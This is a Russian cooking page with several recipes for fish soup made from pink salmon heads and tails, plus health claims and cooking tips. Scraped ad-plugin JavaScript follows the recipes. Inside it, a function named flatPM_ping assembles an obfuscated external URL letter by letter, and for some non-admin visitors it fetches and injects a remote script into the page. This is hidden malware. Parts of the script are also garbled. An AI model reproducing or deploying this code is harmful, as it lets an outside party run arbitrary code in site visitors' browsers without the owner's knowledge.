Уха из головы горбуши рецепт

Уха из хвоста и головы горбуши

Такое блюдо как уха из хвоста и головы горбуши, пользуется большой популярностью у большинства домохозяек. Чтобы ее сварить, достаточно иметь хвост и голову рыбы. Что касается дополнительных ингредиентов, то их можно приобрести в любом продуктовом магазине.

Уха имеет очень низкую калорийность. Несмотря на это, уха, сваренная из горбуши, обладает уникальными лечебно-профилактическими свойствами, благодаря наличию витаминов и микроэлементов. Особенно полезен этот суп во время диет. Кроме этого, его можно употреблять даже детям.

Уха из горбуши: как правильно приготовить

Уха – это, пожалуй, самое легкое и быстрое в приготовлении блюдо. Сначала достаточно сварить бульон, а потом заправить его овощами и специями. Если варится уха из консервов, то делается все наоборот: сначала отвариваются овощи, а потом добавляются консервы.

Добавление в продукт специй, делает уху настоящим блюдом. Это могут быть такие приправы, как зелень, соль, перец и лавровый лист. Чтобы уха была более сытной, к ней добавляют различные крупы или овощи. Хвост и голова – это стандартный набор, с помощью которого можно сварить уху, хотя можно добавить и другие фрагменты. Несмотря на это, как правило достаточно хвоста и головы, если учесть, что они не маленькие.

Приготовление ухи занимается минимальное количество времени. Сварить ее можно за 15 минут. Главное, хорошо почистить рыбу, чтобы было как можно меньше костей. После готовности, уху желательно накрыть крышкой и подержать ее так около часа.

На сколько полезна уха из горбуши

Уха из горбуши – это не только вкусное, но и полезное блюдо. Наличие большого количества витаминов и микроэлементов делает ее незаменимым блюдом для каждодневного рациона. Нежирные кислоты омега-3 способствуют защите организма от злокачественных новообразований и улучшают состояние кожного покрова. Такие витамины, как А, В, С и РР благотворно влияют на умственные и физические способности организма человека. Кроме этого, мясо горбуши содержит такие минералы, как хром, йод, фосфор, сера и магний, которые принимают активное участие в обмене веществ.

Уха из головы и хвоста горбуши

Для приготовления ухи используют различные виды рыб, но наиболее вкусной получается уха из головы и хвоста горбуши.

Почему лучше уху варить из головы?

Отдельные домохозяйки, после разделки горбуши не нужные части, такие как голову, хвост и плавники просто выбрасывают. Скорее всего, что они не знают, что из этих частей получается вкуснейшая уха.

Естественно, что если сварить одну голову и хвост, то вряд ли из этого получится вкусное блюдо, если не добавить к бульону дополнительные составляющие. Но благодаря наличию таких частей, бульон получается наваристый и полезный.

Что еще следует добавить в бульон?

Дополнительные ингредиенты делают уху более вкусным блюдом. Например:

  • если добавить сельдерей и петрушку, то это придаст блюду специфический вкус и аромат;
  • не помешают в ухе и такие приправы, как перец черный и лавровый лист;
  • а свежие овощи, вроде картофеля, моркови и репчатого лука, сделают уху более вкусной и питательной.

Рецепты от специалистов, ТОП-5 рецептов

Уха из горбуши

В ее состав входят:

  • голова горбуши – 3 штуки;
  • хвост горбуши – 3 штуки;
  • картофель – 6 шт;
  • лук репчатый – 1 луковица;
  • зелень, соль, перец – по вкусу.

Набор для ухи следует засыпать в посуду с водой, поставить на огонь и проварить 25-30 минут. После этого, состав процедить, чтобы получился чистый бульон. Очистить и нарезать картофель, после чего состав довести до кипения.

После этого очистить морковку с луковицей, а затем добавляем в бульон и опять варить минут 15-ть. По истечении этого времени, в уху добавить рыбу, соль, зелень и перец, после чего кастрюлю накрывают крышкой и выдерживают минут 10-15-ть.

Уха из консервированной горбуши

Ее составляющие:

  • одна банка консервированной горбуши;
  • 3 штуки картофелины;
  • 3 ст. ложки пшена;
  • 1 штука морковки;
  • 1 луковица лука репчатого;
  • специи (соль, перец, зелень) по вкусу.

Поставить воду на огонь и довести до кипения, добавив к ней пшено. Его нужно варить 15 минут, затем к нему добавляются все остальные ингредиенты, кроме консервов. После того, как овощи сварятся, к ним необходимо добавить консервы из горбуши.

Уха из горбуши с добавлением яйца

Для этого нужно иметь:

  • 500 г горбуши;
  • 3 картофелины;
  • 3 куриных яйца;
  • 1 луковицу лука репчатого;
  • 1 морковку;
  • масло сливочное и зелень по вкусу.

Рыбу необходимо порезать на кусочки, поместить ее в кастрюлю, налить воды и поставить на огонь. Рыбу варят 25 минут. При этом ее нужно посолить. К мясу горбуши добавить порезанную на кубики картошку. Варить до готовности. Пока уха варится, отдельно измельчить лук и морковку и запарить на сковородке со сливочным маслом. Как только картофель будет готов, в уху добавляют зажарку и доводят до кипения. В этот момент разбивают два яйца и сбивают в отдельной посуде. После этого их вливают в кипящую уху и помешивают. В заключение, уха приправляется зеленью и закрывается крышкой. Огонь в это время уже должен не гореть.

Уха из горбуши с грибами

Для этого нужно заготовить:

  • 300 г мяса горбуши;
  • 1 луковицу лука;
  • 1 морковку;
  • 3 картофелины;
  • 200 г шампиньонов;
  • специи и зелень по вкусу.

Как приготовить:

Мясо горбуши нарезать кусочками и слегка обжарить с двух сторон. После этого рыбу помещают в глубокую кастрюлю и ставят на огонь (с водой), где ее варят в течении 20-25 минут. Сюда же нужно добавить и измельченный картофель. Грибы, лук и морковку следует порезать и обжарить, сделав с них зажарку. После готовности, зажарка добавляется к блюду. В заключение, грибную уху приправляют специями и зеленью.

Уха по-царски

Необходимые ингредиенты:

  • голова горбуши – 700 г;
  • мясо горбуши – 300 г;
  • лук репчатый – 3 шт.;
  • морковка – 1 шт.;
  • картофель – 3 шт.;
  • водка – 100 мл;
  • приправы по вкусу.

Технология приготовления:

В посуду с водой поместить голову рыбы вместе с неочищенной луковицей и варить 15-20 минут. Добавить к блюду мясо рыбы и варить еще минут 15.

Извлечь из супа рыбу с луковицей, а вместо них засыпать измельченную картошку и две луковицы. После готовности, сюда же добавляют рыбу, которую очищают заранее от костей, а также добавить специи вместе с водкой и довести до кипения.

Некоторые хитрости приготовления ухи

  • Вкус ухи получится более насыщенным, если после приготовления ее подержать некоторое время под крышкой.
  • Если в уху добавить немного жидкого дыма, то появится ощущения наличия костра.
  • Уху можно приготовить как из одного вида рыбы, так и из нескольких.
  • Добавлять специи рекомендуется исходя из предпочтений остальных членов семьи или друзей.
  • В процессе приготовления не следует уху мешать, так как мясо рыбы может развалиться.
  • Если уху варить на мелком огне, то бульон всегда будет прозрачным.

Уху можно употреблять каждый день, так как от этого не будет никакого вреда, а только польза. Тем более, если учесть на сколько быстро ее можно сварить и насколько это простое в приготовлении блюдо. Кроме этого, приготовление ухи доступно для любой хозяйки, так как в ней отсутствуют дорогостоящие ингредиенты.

Уха из горбуши отлично подойдёт для детского меню от 1 годика. ПП-рецепт, подойдёт для нестрогого поста

Очень люблю эту рыбку. Отличное сочетание вкуса, запаха (если конечно она свежая) и цены! Приобретаю её с головой. Тушку мы засолили (Рецепт можно посмотреть здесь). А вот с обрезками и головой мы поступим следующим образом – сварим из них вкуснейшую уху или рыбный супчик. Такой суп можно в дни нестрогого поста

Сама голова и обрезки (хребты и кончик хвоста) – 300 гр.

Лук репчатый – 1 некрупная головка.

Картофель – 2 небольших клубня.

Соль – по вашему вкусу.

Наливаем воду, закидываем и варим голову и обрезки горбуши.

После закипания, кипятим пару минут и сливаем всю воду.

Тщательно промываем проточной водой обрезки рыбы и моем саму кастрюлю.

Делаем мы это для того, чтобы бульон был более чистый, прозрачный и вся слизь с рыбы не плавала в нашем супе.

В кастрюлю наливаем вторую воду и ставим уже варится нашу уху.

Рыбу провариваем 30 минут и процеживаем через сито или мелкий дуршлаг (мы варим суп деткам, чтобы косточки не остались в бульоне). Рыбку откладываем в сторонку, пусть немного остынет.

А в бульон отправляем нарезанные мелким кубиком лук и морковь.

Тем временем, рыбка остыла, мы перебираем её от косточек и отправляем её в наш бульон.

Режем картофель кубиком 1,5*1,5 см и отправляем в след за рыбкой.

Варим почти до готовности. Солим суп, на 2 л я кладу чуть больше половинки столовой ложки.

В конце добавляем зелень (мне больше нравится зелень укропа в супах).

Провариваем пару минут и выключаем. Даём настоятся 15 минут.

Приятного аппетита! Пробуйте и наслаждайтесь вкусом.

Особенности рецепта приготовления ухи из головы горбуши

Сегодня обсудим тему: особенностей рецепта приготовления ухи из головы горбуши. Уха из головы горбуши рецепт очень распространенный, но тем не менее особенностями горбуши является то что блюда из нее получаются мало калорийными и обладает лечебно – профилактическими свойствами.

Рецепт №1

И так, что же нам понадобится:

  • Головы горбуши – 4 шт.
  • Сельдерей – 100 гр.
  • Петрушка корень – 100 гр.
  • Репчатый лук – 1 головка
  • Картофель – 5шт.
  • Соль, перец, зелень используем по вкусу.

Приступим к приготовлению:

  1. Головы промывает, складываем в емкость.
  2. Сельдерей, корень петрушки, лук очищаем и целиком закладываем рыбьим головам. Заливаем водой, солим и оставляем варится около 20 минут.
  3. Картофель чистим и нарезаем крупным кубиком.
  4. После приготовления бульон процеживаем, погружаем в него картофель. Варим 10 – 15 минут.
  5. Пока варится картофель снимаем образовавшуюся пену чтоб бульон не помутнел. С голов снимаем мясо.
  6. За 10 минут до конца приготовления закладываем мясо, перчим, присаливаем если необходимо
  7. При подачи посыпаем обильно зеленью.

Рассмотрим один из классических рецептов

Классический рецепт рыбного супа из голов горбуши с пшеном и яйцом готовится очень быстро, так как рыбный бульон варится очень быстро. Рецепт будет таков:

Продукты необходимые для приготовления:

  • Головы горбуши 3 – 4 шт.
  • Картофель – 5 – 6 средних клубней
  • Пшено – 1/3 стакана
  • Сладкий перец – 1 шт.
  • Яйцо перепелиное – 3 шт.
  • Помидор – 1 шт.
  • Лук – 1 головка
  • Соль, перец по вкусу. Зелень.

Основные шаги:

  1. Головы нужно промыть, залить холодной водой и поставить варится на 10 – 15 минут.
  2. Картофель очищаем, нарезаем.
  3. Пшено промываем, оставляем в теплой воде до набухания.
  4. Сладкий перец очищаем, нарезаем соломкой.
  5. Перепелиные яйца отвариваем вкрутую.
  6. Помидор бланшируем и нарезаем крупным кубиком.
  7. Лук очищаем, мелко рубим и пассеруем на сухой сковороде до размягчения, но чтоб не потемнел.
  8. Бульон процеживаем, головы обираем, рыбу с голов оставляем в тарелке.
  9. В бульон закладываем пшено, провариваем в течении 15 минут, затем закладываем картофель , перец и варим еще 10 – 15 минут.
  10. Яйца очищаем и разрезаем пополам.
  11. За 5 минут до готовности солим, перчим, закладываем помидоры.
  12. При подачи в тарелку кладем половинку яйца и присыпаем зеленью если любите.

Присутствие круп в ухе, есть ли необходимость? Давайте узнаем.

Издавна, рецепт ухи не включал в себя крупы. Но что б сделать блюдо сытнее стали пробовать рецепты с добавлением различных круп. Например очень популярна стала уха с перловой крупой в мультиварке.

Так как перловая крупа дает сытность блюду.

Бабушкин рецепт выглядит так:

  • Головы и хвосты горбуши – 2 шт.
  • Лук – 2 головки
  • Картофель – 3 — 4 клубня
  • Перловая крупа – 2 ст. ложки
  • Сливочное масло – 20 гр.
  • Соль, перец, лавровый лист, зелень

Технология приготовления:

  1. Головы и хвосты моем, закладываем в чашу мультиварки, лук очищаем и тоже погружаем в мультиварку. Заливаем водой, устанавливаем режим «варка» на 20 минут.
  2. Картофель чистим, моем, нарезаем в произвольной форме.
  3. Перловую крупу, промываем и предварительно отвариваем до полуготовности.
  4. Готовый бульон процеживаем, закладываем в него крупу, картофель, устанавливаем режим «суп» на 30 минут.
  5. Вторую луковицу очищаем, пассеруем на сливочном масле и отправляем в мультиварку.
  6. За 2 – 3 минуты до готовности солим, перчим, посыпаем половиной зелени.
  7. Вторую половину зелени подают в креманке, по желанию можно посыпать еще и свежей зеленью.

Рецепт от первоисточников, узнаем все тонкости

Следующий рецепт рыбного супа будет с рисом. Так готовит моя мама, для того что б вас заинтересовать я решила что рецепт будет с пошаговым фото, для этого специально фотографировала как мама готовит это изысканное блюдо.

Нам нужно:

  • Голова и хвост горбуши от одной тушки
  • Рис – 100 гр.
  • Лук – 1 шт.
  • Картофель – 3 шт.
  • Морковь – 1 шт.
  • Лавровый лист, перец горошком, перец красный молотый, соль по вкусу.

Приготовление:

Этап 1. Хорошо промываем голову и хвост. Перекладываем в кастрюлю с толстым дном, соли, кладем перец горошком и лавровый лист( кастрюля с толстым дном — это именно отличительная особенность приготовления моей мамы), заливаем водой и варим порядка 20 минут.

Этап 2. Рис промываем в нескольких водах до того пока вода не станет прозрачной.

Этап 3. Картофель, морковь очищаем, моем. Лук чистим. Нарезаем картофель кубиком крупным, морковь и лук мелким кубиком.

Этап 4. Процеживаем готовый бульон, закладываем в него рис и картофель. Варим до полуготовности картофеля и риса.

Этап 5. Закладываем морковь и лук, кусочки рыбы от головы и хвоста. Солим, перчим. Варим до готовности. Перед подачей посыпаем зеленью.

Уха или рыбный суп из головы горбуши — простой классический рецепт

Из этой короткой статьи вы узнаете простой классический рецепт приготовления ухи из головы и хвоста горбуши. Познакомитесь с основными продуктами, которые применяются при готовке. Почитаете, как правильно подготовить эти продукты к использованию. Пошаговый рецепт приготовления, несколько красочных фото помогут вам научиться готовить рыбное блюдо в домашних условиях.

Ингредиенты

горбуша (голова, хвост) 350 г
вода 2 л
картофель 170 г
лук репчатый 1 шт.
морковь 1 шт.
перец-горошек 5-7 шт.
лавровый лист 2 шт.
соль 1 ст. л.
растительное масло 30 г
рис 70 г

Пошаговое приготовление

  1. Голову, хвост, оставшиеся кусочки мякоти, хребет горбуши в количестве 350 граммов тщательно моем под проточной водой, помещаем в кастрюлю небольшого размера, приблизительно на 3 литра, заливаем двумя литрами холодной воды. Включаем плиту, ставим кастрюлю на огонь, пусть закипает.
  2. Пока бульон закипает, мы займемся обработкой овощей для рыбного супа. Одну среднюю по величине морковь очищаем от кожицы, моем под краном, натираем на средней терке, кладем в сторону. Одну среднюю луковицу очищаем от шелухи, моем под проточной водой, режем полукольцами, кладем в сторону. Два-три средних по величине картофеля очищаем от кожицы, моем под краном, режем на разделочной доске небольшими кубиками.
  3. Ставим сковороду на огонь, наливаем туда 30 граммов растительного масла. Когда масло хорошо разогреется, добавляем в сковороду натертую морковь и нарезанный лук. Уменьшаем огонь под сковородой до среднего, обжариваем овощи до золотистой корочки приблизительно 10-12 минут, периодически помешивая.
  4. Рыба уже успела свариться. Вынимаем ее из кастрюли, ставим в сторону, чтобы она остыла, так как нам нужно будет отделить кости.
  5. Рыбный бульон процеживаем через сито, чтобы удалить мелкие кости, плавники, ненужные фракции.
  6. Ставим процеженный бульон снова на огонь, предварительно вымыв кастрюлю, даем ему закипеть, добавляем туда два лавровых листа, семь горошин черного перца, столовую ложку соли. Затем к бульону добавляем нарезанный кубиками картофель. Когда он закипит, высыпаем в кастрюлю 50-70 граммов риса, предварительно промыв под краном холодной водой.
  7. После закипания помещаем в кастрюлю обжаренные морковь и лук со сковороды, перемешиваем кухонной ложкой суп, делаем маленький огонь, пусть варится до готовности. Процесс этот занимает около 15-20 минут.
  8. Пока суп варится, рыба остыла. Отделяем кости, а мякоть добавляем в кастрюлю перед самым концом варки.
  9. За 2-3 минуты до того, как суп будет готов, можно добавить в него 2-3 веточки свежей петрушки.

Подавать такую уху к обеденному столу лучше со свежими овощами. Получается она красивого золотистого цвета, сытная, питательная, полезная для взрослых и детей.

Видео

Познакомившись с информацией из этого видеоролика, вы узнаете, как приготовить уху, а точнее сказать, рыбный суп из головы, хвоста горбуши. Получите советы по подготовке ингредиентов, увидите подробно весь процесс приготовления.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};